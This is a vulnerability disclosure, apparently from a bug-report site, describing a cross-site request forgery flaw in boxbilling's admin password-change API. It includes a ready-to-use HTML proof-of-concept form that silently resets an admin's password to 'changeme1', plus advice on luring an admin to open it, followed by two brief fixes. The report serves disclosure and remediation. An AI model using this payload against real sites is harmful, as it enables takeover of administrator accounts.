Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling
Jul 5th 2021
CSRF on changing password of an admin account. There is no token or anti csrf implemented.
🕵️♂️ Proof of Concept
Create a .html file (poc.html) for example and copy paste the following code in it. Change localhost to ur domain or ip address.
<html><head> <title>CSRF PoC</title> </head><body> <form action="http://localhost/box/api/admin/profile/change_password" method="POST"> <input type="hidden" name="password" value="changeme1" /><br /> <input type="hidden" name="password_confirm" value="changeme1" /><br /> <input type='submit' value='Click here' /> </form> </body></html>
send this file to a admin when he opens the file and clicks on it the password will be change to changeme1. see the screenshot below with a burp request of what is happening.
This vulnerability is capable of changing the admin password into a new one. If you send the admin the link and he clicks on it the password will be changed directly because there is no csrf protection. With this attack you can become an admin on the website.
Verify the old_password first.
Implement anti csrf